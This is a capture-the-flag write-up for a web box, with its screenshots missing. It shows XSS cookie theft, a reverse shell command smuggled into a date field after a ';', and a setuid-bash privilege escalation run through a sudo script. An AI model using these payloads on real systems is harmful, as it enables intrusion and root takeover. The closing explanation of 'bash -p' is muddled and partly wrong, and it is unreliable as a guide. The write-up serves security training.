
First i start by scanning our machine:

the port 5000 seemed to be the initial go to ->

So after that I'll use feroxbuster to see if there is more to this:

the For questions button led to the support page:

and the dashboard is unauthorized:

Let's see if we can trigger some errors:

absolutely no response when submitted, weird

after trying to XSS this website with this:


I got this error back:

we have to modify this packate adding our payload at the ending separeting it with “;” and in our User-Agent field.

python3 -m http.server 8989
Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
nc -lvnp 8585

tried to capture a report generated and paste a shell

date=2023-09-15; sh -i >& /dev/udp/ 0>&1

but it did not work

so i tried creating a file:


make a python server on port 8000, call it to retrieve your shell, then it will execute on server and return a reverse shell


If we cat the file and analise it, we can find that its manipulating a file name “initdb.sh”

echo "chmod +u+s /bin/bash" > initdb.sh
chmod +x initdb.sh
sudo /usr/bin/syscheck
/bin/bash -p 

this writes the string chmod +u+s /bin/bash into it. The chmod +x initdb.sh command then makes the initdb.sh file executable. The sudo /usr/bin/syscheck command is likely used to check the system for any inconsistencies or vulnerabilities.

The +u+s argument specifies that the user who owns the file (u) should be granted the setuid permission (s). The setuid permission allows any user to execute the file with the privileges of the user who owns the file, rather than the privileges of the user who started the file.

In this case, the /bin/bash file is being modified to allow the setuid bit for the user who owns the file. This means that any user can execute bash with the privileges of the user who owns the file, which is typically the root user. This technique can be used to escalate privileges in a system.

The crucial part of this sequence is the /bin/bash -p command, which starts a new bash shell with the -p option. This option preserves the environment's real and effective user and group IDs, as well as the saved user and group IDs. This is important because it ensures that the new bash shell runs with the original user's privileges, rather than the privileges of the user who started the bash shell.

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